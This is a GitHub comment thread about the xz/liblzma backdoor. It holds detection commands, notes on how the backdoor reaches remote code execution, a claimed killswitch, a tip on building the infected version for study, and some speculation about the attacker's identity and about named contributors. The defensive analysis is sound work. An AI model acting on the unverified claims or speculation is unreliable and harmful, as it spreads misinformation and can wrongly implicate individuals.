Has anyone been able to actually confirm that this function/binary includes the functionality described in the report? I'm looking at a matching binary and the function that starts with those bytes just chooses different implementation of CRC calculation based on the available instruction set, for which it does indeed call CPUID.

The report also claims some symbols were obfuscated in 5.6.1 but the symbol table looks identical with 5.6.0

@everything411
Copy link

Be careful with ldd, read "Please do not use ldd on untrusted binaries" from the gist. There is a detect.sh script which should be used instead.

Note that the detect.sh script also uses ldd.

path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"

Attacking ldd needs some specific conditions. See https://sourceware.org/bugzilla/show_bug.cgi?id=22851.

Anyway, accoding to some current analysis about the backdorr, there is no evidence that the backdoored binary file can attack ldd.

So it seems that it's just ok to use ldd here.

@thesamesam
Copy link
Author

thesamesam commented Mar 30, 2024

Please be patient if I missed anything overnight, as I am just waking up and catching up to many messages on IRC etc.

@AN4364364 Thank you for asking politely. #tukaani on IRC before this incident was a very small, cosy community with about 10 members. I have been a member of the channel for a few years and I was around when the project switched from self-hosted -> github. I followed the Tukaani org and starred the gh repo when it moved and I guess it happened at that point.

My experience is different from the Fedora maintainer as I didn't receive any emails or anything like that encouraging me to update quickly, but then again, we updated quickly by ourselves. Or maybe I didn't receive encouragement because the script maybe checks just for rpm/deb. I don't know.

@LaRevoltage
Copy link

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for beein incorrect.

No, the attacker's target were deb and rpm distros, since they're mainly the ones who patched SSHD for systemd-notifications.

Read https://www.openwall.com/lists/oss-security/2024/03/29/4

The source-based distros are the main enemies here for the attackers, because they're the ones most prone to find these problems. Thanks to @xry111 's contributions in these areas the systems will be much more hardened from now on.

Your accusations are quite dubious, since we're talking about a anonymous attacker in cahoots with a very known & public contributor. We can very well ask about your interest in keeping these unfounded accusations alive, feels like your intentions are less than noble.

I don't think heating this thread up with backwards accusations is great.
Also note that OP says multiple time, that he does not want to blame anyone because he may be wrong, and he is only conducting his own research, which I believe is a good thing to do.

@NuLL3rr0r
Copy link

1000059814

@AN4364364
Copy link

Thank you thesamesam for the response

also to @everything411

We cannot even determine whether Jia Tan is an individual person or a hacker group.

Fake name and VPN ip address cannot indicate any real information about the hacker(s) behind the account.

If people want to withold the IP addresses they have due to some moral belief about that category of previously-public data, I have no argument for that. But if people truly believe the IP address has zero value to ongoing efforts, that is factually wrong. Other parties hold data that may cross over with that user's IP address history (even accounting for false positives and how VPNs work).

Even if it's a, "I'll only give this privately to people who can positively identify themselves and prove they won't act like some Reddit user", that would be helpful and might mitigate the concerns around posting IP addresses publicly.

@everything411
Copy link

everything411 commented Mar 30, 2024

We should take all these information provided by Jia Tan himself as fake ones. fake name, fake ip address, fake country, fake timezone, etc.

What I said not mean that these ip address are of no value, but I don't want there is someone to blame other people just because of these very potentially fake infomation.

@LaRevoltage
Copy link

Is there any updates research on the matter yet?

@pillowtrucker
Copy link

$ echo hey everybody I worked on big commercial strong unix 25 years ago such as the fortress of security AIX and
#

@LaRevoltage
Copy link

About the question of a single individual/group

It seems that the following identities were used in the process prior and after the backdoor implementation:
Hans Jansen’s
Jigar Kumar

Their GitHub accounts are nearly as active as the main Jia account, and where used occasionally for pressuring updates/making one or two commits

It implies that there was actually one person with main account as Jia, and other accounts as his fakes, since a group would have managed to make all 3 accounts active.

Source:
https://boehs.org/node/everything-i-know-about-the-xz-backdoor

@everything411
Copy link

I just don't want anyone here to say something like "A Chinese/Asian name! These bad Chinese/Asian hackers!!".

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

@LaRevoltage
Copy link

Following the IP question:
First of all, it's not guaranteed that the actor's OPSEC was ideal, in fact, no one's is. If at least one request was made with unchanged IP it is a game over. We should also keep in mind that IP is not the only trace to person's real identity. If the actor didn't use whonix like system to randomify browser data, then he can be traced to at least a country with the language data browser send.

Another aspect is that it is relatively easy to check it the IP belonged to a VPN node or a Tor node, the only exception to this is residential proxies/VPNs. So if the real IP was in fact used in some request it wouldn't be quite hard to parse and determine.

Emails usually contain the IP of mailing computer in headers, were those already checked?

@arizvisa
Copy link

this gist thread is a shitshow. some posts are sensical, but then some are borderline paranoid and delusional. stop accusing accounts/countries/etc and then poking those things everywhere you find them. let the workers work.

@AN4364364
Copy link

replying to the large image posted depicting the "Jia Cheong Tan" name

I found a couple open source software copyright notes that include that name that were indexed by search engines, indicating their code (libarchive contributions) made it into some products.

https://www.tcsag.de/fileadmin/user_upload/Information_Open-Source-Software_PES_Pro_IP.pdf
https://amazon-source-code-downloads.s3.amazonaws.com/eero/eero-embedded/eero-oss-attribution-latest.txt

With zero commentary on the true ethnic background of the bad actor, as I don't think that's their real name, I think "Jia Cheong Tan" and "Jia Tan" are useful search terms. Only because they had to have reused it when operating this persona.

@schkwve
Copy link

schkwve commented Mar 30, 2024

As usual the actor will reveal itself by being most vocal about being innocent.

I personally doubt this would happen given the backdoor appears to be very sophisticated and has taken a lot of time to implement. Thus I can assume that the malicious actor is smart enough to not talk very much.

@snnn
Copy link

snnn commented Mar 30, 2024

I makes me think of one thing: if you ever heard of BinSkim and you add it to your build pipelines, then if anyone ever tried to insert a binary *.o file into your build like this, at least the malicious file needs be compiled with required security flags to prevent common attacks. It's better than doing nothing.

Also, no Linux distro ever run any static code analysis when building their packages. Never. Think how would be possible to insert clang-analyzer or CodeQL into rpm-build. And even if you do, nobody has enough time to address all the false positives.

On Windows we can use ApiValidator tool and a whitelist txt file to validate if all the Windows APIs the binary uses are in the whitelist. By doing this we can add a safety check in our build pipelines to warn us if a new API call was added. For example, if anyone ever tried to use CreateRemoteThread to create injections to another process, at least we could know that. However, it cannot handle indirect calls. Maybe some kind of static analysis could help us generate a list of parameters of all the GetProcAddress calls.

If your build environment is not in an isolated network, an attacker can host their payload in a public cloud storage(like Github) then download it during a build, which makes it hard to trace. For example, Python's manylinux docker images. Even you have verified the crypto checksums when downloading open source software's source code(like libxcrypt), it doesn't prevent them downloading more data during the build.

@arizvisa
Copy link

@NuLL3rr0r: ftr, there's also the jiat75@gmail.com email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

@waterkip
Copy link

Is there any updates research on the matter yet?

I recommend keeping an eye open here: https://openwall.com/lists/oss-security/2024/03/

@waterkip
Copy link

@NuLL3rr0r: ftr, there's also the jiat75@gmail.com email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

I mailmapped the repo yesterday, these are the units they have committed with:

Jia Cheong Tan <jiat0218@gmail.com> Jia Tan <jiat0218@gmail.com>
Jia Cheong Tan <jiat0218@gmail.com> Jia Tan <jiat75@gmail.com>
Jia Cheong Tan <jiat0218@gmail.com> jiat75 <jiat0218@gmail.com>

@MagpieRYL
Copy link

I want to do some analyzing with the samples which I lack yet, like the polluted "sshd" binary or .so files.
Can any guys offer one if you have it? APPRECIATE SO MUCH !

@DanielRuf
Copy link

@arizvisa https://github.com/jiat75 is the "real" account, which commited all the time to xz.

You just don't see the PRs and commits there anymore, because the xz repo was disabled by GitHub.

@evokelektrique
Copy link

Damn

@NuLL3rr0r
Copy link

@snnn thanks for introducing BinSkim! I did not know about that.

I personally do agree with @arizvisa let's stop accusing people with similar names or from a certain country since I as well highly doubt those identities are real identities and the malicious actor is smart enough to still someone else's identity.

@NuLL3rr0r
Copy link

NuLL3rr0r commented Mar 30, 2024

@MagpieRYL you could install a Gentoo instance as I see they still have the ebuilds for 5.6.1 and the infected source archive on their mirrors, but masked it so no one can install it by mistake. But, you can unmask it deliberately and build it from source.

@gh-nate
Copy link

gh-nate commented Mar 30, 2024

I'm watching some folks reverse engineer the xz backdoor, sharing some preliminary analysis with permission.

The hooked RSA_public_decrypt verifies a signature on the server's host key by a fixed Ed448 key, and then passes a payload to system().

It's RCE, not auth bypass, and gated/unreplayable. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

Multiple posts in a thread including ...

Apparently the backdoor reverts back to regular operation if the payload is malformed or the signature from the attacker's key doesn't verify.

Unfortunately, this means that unless a bug is found, we can't write a reliable/reusable over-the-network scanner. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowkezwz6g2q

@christoofar
Copy link

How many Docker/LXC images that pulled bleeding somehow managed to incorporate this in the last month, I wonder, because the tarball was pulled. Have already seen Go programmers that use use CGo raise eyebrows because they often take the shortcut to build from a tarball to make the whole build easier.

@smallxu038
Copy link

This command can check whether Docker containers are running the affected version of xz.

docker ps -aq | xargs -I {} docker exec {} sh -c 'xz --version || echo "xz not found"' 2>/dev/null

Clearly, this incident has deepened prejudice and discrimination against Chinese people. I would rather believe that it is a pseudonym for an organization, not a real person :(

@DanielRuf
Copy link

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

@wryMitts
Copy link

wryMitts commented Mar 30, 2024

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021:
libarchive/libarchive#2103
Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024):
https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

The given DLL and support to open tar.xz is observed in earlier versions of Windows 11 including Windows 22H2.

@NuLL3rr0r
Copy link

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021: libarchive/libarchive#2103 Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024): https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

That would make billions of devices vulnerable!! 🤯

@smallxu038
Copy link

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

Yes, what we need to consider now is how to solve security issues and how to prevent such situations from happening again, rather than attacking people from a certain region. Rational people still make up the majority. This attacker is just one step away from causing greater damage, I am still paying attention to this event, thank you for providing the information.

@DanielRuf
Copy link

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

I would not jump to conclusions here and assume that every touched project has this backdoor. Currently it's about xz version 5.6.0 and 5.6.1.

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

@spawel22
Copy link

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

You need to check it first. Wild guessing means nothing.

@DanielRuf
Copy link

@spawel22 that's what "probably" implies. And my last sentence:

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

Check / verify first, post facts afterwards.

@wryMitts
Copy link

wryMitts commented Mar 30, 2024

Windows 11 22H2 22621.3007 may contain Jia Tan code. See below.
Windows 11 23H2 may contain more.. not tested yet,

Windows 10 22h2

Windows 10 22H2 19045.4170 has libarchive dll, but may be too old, before Jia Tan added commits:
C:\Windows\WinSxS\amd64_libarchive-internal ... (need to add in your UUID in path if different)
Or C:\Windows\System32\archiveint.dll
Version 3.5.1.0

Oldest Jia Tan commit to libarchive is 2021, but none of those commits are in 3.5.1
libarchive/libarchive@v3.5.0...v3.5.1
3.5.0 released in 2020. Only small bugfixes, nothing from Jia since then.
image

Windows 11 22h2

Commits from Jia Tan present!! libarchive/libarchive@v3.5.1...v3.6.2
Code is in use to open tar.xz archives! See link
Windows 11 22H2 22621.3007 contains libarchive 3.6.2.0:
image

Contains proper strings to match dll version to github version as a sanity check

user$strings archiveint.dll | grep libarchive
libarchive 3.6.2

Xz support compiled in by Microsoft:

$ strings archiveint.dll | grep xz
Can't allocate data for xz decompression
xz initialization failed(%d)
No memory for xz decompression
Truncated xz file body
xz data error (error %d)
xz unknown error %d
xz premature end of stream
archive_write_add_filter_xz
.tar.xz
archive_read_support_compression_xz
archive_read_support_filter_xz
archive_write_add_filter_xz
archive_write_set_compression_xz

Windows 11 23h2

No data available yet, come back later?

@chenrui333
Copy link

it might be good to also callout this oss-fuzz pr, google/oss-fuzz#10667

@thesamesam
Copy link
Author

I'm going to mention the oss-fuzz & libarchive because a lot of people keep asking about it but with some commentary next to it. Just going to eat first.

@wryMitts
Copy link

wryMitts commented Mar 30, 2024

Windows 11 using Jia Tan xz code from libarchive

Initial info

In addition to this info

Windows 11 22H2 22621.3007 support for xz files
image

Windows 11 explorer.exe loads archiveint.dll only AFTER opening any .xz archive

image

@cculianu
Copy link

I just don't want anyone here to say something like "A Chinese/Asian name! These bad Chinese/Asian hackers!!".

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

@cyclone-github
Copy link

Simple script to detect if your linux distro is vulnerable to CVE-2024-3094
https://github.com/cyclone-github/scripts/blob/main/xz_cve-2024-3094-detect.sh
(This is a fixed and features added version of https://www.openwall.com/lists/oss-security/2024/03/29/4)

@FlyingFathead
Copy link

FlyingFathead commented Mar 30, 2024

How can we prevent this from happening again in the future?

I'm not sure if this would work in practice, but perhaps there should be an automatic A/B / diff check for the tarball contents against the repository's contents and at least a warning flag alongside the package if the contents between the two aren't matching within a stated version number. It could give some early warning on something being off with the tarball.

Then again, if it's just a warning, most people would probably just ignore it anyway, and that approach might either not cover all scenarios, or make certain aspects over-complex. That being said, if tarball files can contain arbitrary contents that do not match the associated commit or tag in the repository, the discrepancy could be exploited maliciously for users relying on the integrity of those releases. There's a general security aspect to this that might have to be enforced from GitHub's end in the future.

The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.

... Which again made the exploit possible to begin with, and serves a reminder on how convenience tends to lead to lapses in security, and how the overall approach to that might need some serious re-evaluation, especially after major incidents like these.

Just my thoughts on this whole thing, feel free to chime in and/or correct me if I'm wrong.

@thesamesam
Copy link
Author

I have my own thoughts about post-mortem but I plan on writing that up when we're out of the storm. Not that people need to wait on me, ofc. Just think: a) still in the heat of it; b) it's too soon to reflect properly and in a clear-headed way yet.

@cw-alexcroteau
Copy link

cw-alexcroteau commented Mar 30, 2024

@thesamesam "We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why."

Based on the latest information, it looks like an RCE (sending the payload to system() rather than bypassing the auth mechanism, after verifying the key) rather than an auth bypass, while I didn't confirm it myself: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The sad thing is it would not be possible to scan if over network because an invalid key or malformed request makes the code fall back to regular operation.

@DoctorWho8
Copy link

What a revolting development this is! I will probably update the three running Linux systems that might be effected.

@teyhouse
Copy link

This is a very rough sketch but may help in detecting the lib inside Docker and Kubernetes (better use Falco, your CNAPP what ever):
https://github.com/teyhouse/CVE-2024-3094

@thesamesam
Copy link
Author

@cw-alexcroteau Thank you, I will assess.

@Sepero
Copy link

Sepero commented Mar 30, 2024

NixOS devs are reporting that the liblzma patch is not applied, and therefore NixOS is not vulnerable to the sshd exploit

Source:
https://discourse.nixos.org/t/cve-2024-3094-malicious-code-in-xz-5-6-0-and-5-6-1-tarballs/42405/23

@DoctorWho8
Copy link

I wonder if Slackware-15.0 and Slackware 64 15.0 is vulnerable?

@TheRsKing
Copy link

if no port is open for ssh, so it was only accessible internally, it is unlikely that someone attacked me, right? (if ssh is the only case)

@cw-alexcroteau
Copy link

cw-alexcroteau commented Mar 30, 2024

if no port is open for ssh, so it was only accessible internally, it is unlikely that someone attacked me, right? (if ssh is the only case)

@TheRsKing based on current knowledge, that's correct. The vulnerability would be triggered by a specific payload with a given public key being sent to an exposed sshd, it doesn't "phone home" to a C2 server.

@TebosBrime
Copy link

How can we prevent this from happening again in the future? Look at the origin of this attack. Xz developer was working a lot, unpayed, and with health problems. Attacker noticed it and exploited the weak point in a human being. Meanwhile, society in general keep sending billions of dollars to Microsoft, but nothing to such important projects as XZ. If we as a society do not help each other, this is meant to be repeated over and over again. My condolences to xz developer. Good luck.

Not only that. I can also imagine that some developers would be tempted by money. Especially if the attacker is state-sponsored, this would definitely be a conceivable scenario that should be considered for the future.

@wryMitts
Copy link

Review on libarchive 3.6.2 (Windows 11 affected) libarchive/libarchive@02cfa8a
dev quote is meaningful:

If not malicious, I'd say on track to be.

@thesamesam
Copy link
Author

@wryMitts I will add a link to libarchive/libarchive#2103 where the review of possibly affected commits is being coordinated.

@zacanger
Copy link

zacanger commented Mar 30, 2024

@smallxu038

This command can check whether Docker containers are running the affected version of xz.

docker ps -aq | xargs -I {} docker exec {} sh -c 'xz --version || echo "xz not found"' 2>/dev/null

Clearly, this incident has deepened prejudice and discrimination against Chinese people. I would rather believe that it is a pseudonym for an organization, not a real person :(

China has 1.4 billion people and some of the top tech companies and universities in the world. We all use Chinese code every day. So whether it's a pseudoynm or not doesn't matter; if anyone's suddenly Sinophobic because of this, they were already Sinophobic, so I wouldn't worry about it.

@DoctorWho8

I wonder if Slackware-15.0 and Slackware 64 15.0 is vulnerable?

Unlikely based on what's been figured out so far, unless you manually installed a later version than is available in the repos, and also got SystemD working.

@LaRevoltage
Copy link

@thesamesam
Copy link
Author

@LaRevoltage Already linked in the FAQ itself now.

@LaRevoltage
Copy link

https://gynvael.coldwind.pl/?id=782

Someone put a lot of effort for this to be pretty innocent looking and decently hidden. From binary test files used to store payload, to file carving, substitution ciphers, and an RC4 variant implemented in AWK all done with just standard command line tools. And all this in 3 stages of execution, and with an "extension" system to future-proof things and not have to change the binary test files again. I can't help but wonder (as I'm sure is the rest of our security community) – if this was found by accident, how many things still remain undiscovered

Once again, this just excludes a possibility of a developer going nuts over the hard work. It has to be a sponsored attack by 3d party organisation

@LaRevoltage
Copy link

@LaRevoltage Already linked in the FAQ itself now.

Oh, sorry, it wasn't updated for quite some time

@thesamesam
Copy link
Author

A man has to rest! No problem. I would rather people show stuff as they find it.

@panchoh
Copy link

panchoh commented Mar 30, 2024

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

Probably the San-Ti.

Sorry, but after two days of this I had to do it.

@brlin-tw
Copy link

@cculianu

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

Disagreed. We shouldn't jump to any conclusions regardless of whether it is pro-Chinese/anti-Chinese.

@Z-nonymous
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

@cw-alexcroteau
Copy link

cw-alexcroteau commented Mar 30, 2024

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

@Z-nonymous WSL runs regular Linux distributions, with some level of patches. Afaik Ubuntu in WSL includes the regular set of packages, so there's a potential that the affected sshd version is installed just like on a "regular" Linux installation. I've personally used sshd and had to work with systemd in wsl2, so I think it would be safer for people to verify their installation to ensure the backdoored version isn't installed. Of course, it is just present in testing versions for now, and that would apply the same way on WSL.

@GoodMirek
Copy link

GoodMirek commented Mar 30, 2024

Lasse Collin has started making commits to xz, removing another malicious commit blocking a Landlock sandbox:

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd14dedfe63833f8ccbe41b55823b00

Here's the malicious commit that disabled the Landlock sandbox.
https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7

Credit for noticing it: @joeyh@hachyderm.io, @cschabetsberger@mstdn.social

@KFERMercer
Copy link

@cculianu

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

Disagreed. We shouldn't jump to any conclusions regardless of whether it is pro-Chinese/anti-Chinese.

@brlin-tw

he just use the word "likely", why you makes opposition in this hurry?

what kind of "conclusions" you just disagreed actually?

@Z-nonymous
Copy link

In the light of: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The payload is extracted from the N value (the public key) passed to RSA_public_decrypt, checked against a simple fingerprint, and decrypted with a fixed ChaCha20 key before the Ed448 signature verification.

Can someone explain to me this PR openssl/openssl#23301
"LoongArch64: Fix PR #22817 introduced performance regression of ChaCha20"
submitted by someone with little activity, reviewed xry111 and then:

xry111

My approve is useless anyway :(. We need to collect 3 approves from the OpenSSL maintainers AFAIU.

@t8m :

2 approves are sufficient.

Then @slontis approves.

It's an assembly change

@thesamesam
Copy link
Author

thesamesam commented Mar 30, 2024

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team. xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

Also, while it would obviously not make any possible malicious activity okay, loong isn't exactly a big target. Not sure it would really be worth the effort, although I guess maybe during the porting period would be the best time to sneak stuff in.

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

I have no knowledge of the loong ISA to re-review it, but I don't really see any evidence it's merited either.

@duracell
Copy link

@cculianu

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

Disagreed. We shouldn't jump to any conclusions regardless of whether it is pro-Chinese/anti-Chinese.

@brlin-tw

he just use the word "likely", why you makes opposition in this hurry?

what kind of "conclusions" you just disagreed actually?

I'm not a native speaker, but I also understand "likely" as the chances are higher that "the guy isn't Chinese". Which is just not possible to say.
So maybe the wording is just confusing for (at least) some people or it's wrong.

@TyrHeimdalEVE
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

This primarily (at this point) seems to be leveraging hijacking a function for decrypting certificates to smuggle a payload to gain RCE, targeting OpenSSH via systemd dependency (liblzma) as the vector.

@schkwve
Copy link

schkwve commented Mar 30, 2024

Lasse Collin has started making commits to xz, removing another malicious commit blocking a Landlock sandbox:

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd14dedfe63833f8ccbe41b55823b00

Here's the malicious commit that disabled the Landlock sandbox. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7

Do I understand correctly that a single dot prevented the code snippet to compile and therefore disabled the landlock sandbox?
Do snippets that fail to build trigger a warning or something? If so, how come nobody has noticed this before?

@thesamesam
Copy link
Author

@schkwve It only affected the CMake build which very few people use for xz at this point. It's still WIP and not encouraged for it I think. Also, landlock support is still pretty new in the kernel, but even newer in xz, so I wouldn't expect many to notice anyway.

@xry111
Copy link

xry111 commented Mar 30, 2024

In the light of: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The payload is extracted from the N value (the public key) passed to RSA_public_decrypt, checked against a simple fingerprint, and decrypted with a fixed ChaCha20 key before the Ed448 signature verification.

Can someone explain to me this PR openssl/openssl#23301 "LoongArch64: Fix PR #22817 introduced performance regression of ChaCha20" submitted by someone with little activity, reviewed xry111 and then:

I made a stupid mistake in openssl/openssl#22817 and openssl/openssl#23301 fixes it. So I approved it quickly feeling guilty. But as I've explained my approve is useless, only the approves from OpenSSL maintainers count. I remembered 2 as 3 mistakenly though.

And my stupid mistake was "just" making it slower (the condition to use vector routine instead of scalar routine was wrong, thus scalar routine was always used regardless of input size). It's not a security issue. (Note that a Big-O regression may be considered a DoS, but in this case there's no Big-O regression.)

And, ChaCha20 is just an algorithm, both valid users and malicious users can use it. There is nothing in the change specifically favoring malicious uses. Making code faster benefits both valid users and malicious users, but nobody will reason like "to slow down malicious users let's make everything slow" for any algorithm except one-way hashes.

It's just like we know malicious attacker are using BSGS algorithm to hack RSA with too small keys, but every ICPC team is having BSGS algorithm in their code base. And it does not make ICPC same as CTF.

@thesamesam
Copy link
Author

Ah, I didn't realise it was fixing a previous commit of yours. In any case, my comments stand about it not being suspicious at all.

@erinacio
Copy link

Let alone it's loongarch64 assembly code. The machine code it produces just won't run and actually can't run on any x64 machine the xz backdoor targets to.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team.

Just asking if they really reviewed. for side effects

I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effects. that's why I noted the pure issue.
They maybe really want to push Loongson arch support and are played.

xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

I'm making correlations, asking advice. i.e. liblzma_la-crc64-fast.o is the backdoor as per https://gynvael.coldwind.pl/?id=782
xry111 was also commit code for LoongArch for CRC code in xv approved by JiaT75 in tukaani-project/xz#86

, loong isn't exactly a big target.

Well, I need to further investigate, there has been reviews from them in many code/functions modules that are in the analysis from thread in https://www.openwall.com/lists/oss-security/2024/03/29/4 that have been modified for LoongArch in some form
The breath of area they are contributing (comments, reviews, approvals, PRs) in that team is everywhere, Compilation, system services, ssl, crypto, kernel, localization, html, assembly, c, rust, node, nvm, dosbox,

They can't potentially know every possible implications of updates in such a large code base.

Again:
I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effect they don't apprehend.
I will review make-ca but maybe there are places

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

Do you know these people IRL ? Do you know the people they approve the PRs of ? How do you know any GH user is Chinese ? Only real police/federal/interpol investigation can determine that. Even then sometimes they could arrest someone who happened to have found a usb key in Latvia instead of a Russian agent.

I've worked with many Chinese colleages in research & engineering, they are as brilliant minds as anyone. I never implied anything Chinese-related, maybe my fault was trying to explain that Loongson is a Chinese CPU manufacturer for context. I even ever say they were actually from that company. I just assumed they implement support for it.

They might be played by people complaing about bad Loongson support, providing engineered reports, forcing to make changes they don't always understand the side effects.

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

Again thank you xry111 for the replies even though I would also like other maintainers input about their review.

@Z-nonymous
Copy link

Let alone it's loongarch64 assembly code. The machine code it produces just won't run and actually can't run on any x64 machine the xz backdoor targets to.

Right, on some other places it's just C defines that can be modified somehow at pre-processing stage to be enabled.

@erinacio
Copy link

erinacio commented Mar 30, 2024

I need to further investigate ...

Please stop pointless investigation unless you meet any of that:

  • you're a security expert and can audit the code on your own;
  • you know any potentially affected repos in depth so you can find any suspicious modification;
  • you can stop posting unsound suspicions here;

Please, as I indicated before, submit issues and discuss in each potentially affected repo there. This is more or less a news following-up gist. I only want to hear about the latest updates about the security incident.


Maybe you need an internet break more than larhzu does? The world is already aware of this issue and everyone related is working hard on it. The next time you check the security issue, it may already be sorted out.

@kam821
Copy link

kam821 commented Mar 31, 2024

Maybe you need an internet break more than larhzu does? The world is already aware of this issue and everyone related is working hard on it. The next time you check the security issue, it may already be sorted out.

+1

@marco-silva0000
Copy link

I'd pay good money if you'd shut up

We might need you @Ninpo

@Ninpo
Copy link

Ninpo commented Mar 31, 2024

@Z-nonymous you really need to leave this thread. You're contributing nothing but white noise and misdirection. xry111 have nothing, nothing to do with this xz vulnerability.

@timtas
Copy link

timtas commented Mar 31, 2024

@Z-nonymous you really need to leave this thread. You're contributing nothing but white noise and misdirection. xry111 have nothing, nothing to do with this xz vulnerability.

Just out of curiosity: is "xry111 have" bad english or woke-speak?

@thesamesam
Copy link
Author

Let's please focus on the issue at hand. Thanks.

@shanghaox
Copy link

If someone wants to do bad things, he will avoid a correct name.

@FrankHB
Copy link

FrankHB commented Mar 31, 2024

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

This also prevents vendor lock-in. Consider when you have a compromised meson...

@ItzSwirlz
Copy link

I want to note - I'm not an expert or anything, but it seems the way of malware infections are now spread is not through cringy downloads from sketchy sites. It seems that attackers are now working towards infecting safe, regular files.

Example: Fractureiser was the result of a guy who compromised CurseForge accounts and injected code into Minecraft Mod JAR files that would then download a payload, and basically install hidden malware onto the system and sneakily hide itself in with similar names to other legit programs.

Here, although this was not account compromise, the idea of sneakily injecting and obfuscating malicious code to secretly do a payload, and then hide itself for a scary amount of time before tech-savvy people figure out something suspicious is going on.

This makes it easier for bad actors in many different ways - this solves the issue of users thinking "I couldn't have gotten a virus, I got it from a legitimate source!" and also solves the issue of being apparent malware that the user knows something is wrong. Instead it will just sit dormant and do its work, without ever having to reveal itself.

@sgammon
Copy link

sgammon commented Mar 31, 2024

There is a string embedded in the binary, as shown here:

https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115

Which appears to function as a killswitch:

https://piaille.fr/@zeno/112185928685603910

In which case this backdoor may be rendered inert by adding the following to /etc/environment:

yolAbejyiejuvnup=Evjtgvsh5okmkAvj

@FrankHB
Copy link

FrankHB commented Mar 31, 2024

